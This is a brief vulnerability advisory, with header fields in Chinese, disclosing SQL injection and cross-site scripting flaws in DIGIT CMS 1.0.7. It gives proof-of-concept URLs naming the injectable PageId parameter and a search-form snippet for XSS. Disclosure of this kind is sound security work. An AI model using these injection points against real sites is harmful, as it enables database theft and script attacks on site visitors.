标题: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
作者: BHG Security Center
下载地址:
影响版本: [1.0.7]
测试平台: ubuntu 11.04
发现者列表
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
 
-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center Web :   Where : From Remote
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]
 
~ [PoC] /path/Default.asp?sType=0&PageId=[Sqli]
 
 
 Enter In Search Box XSS Code ~
 
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM  style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
 
~ [PoC] ~: /path/Default.asp
 
Note: There are vulnerabilities in the search field that you can use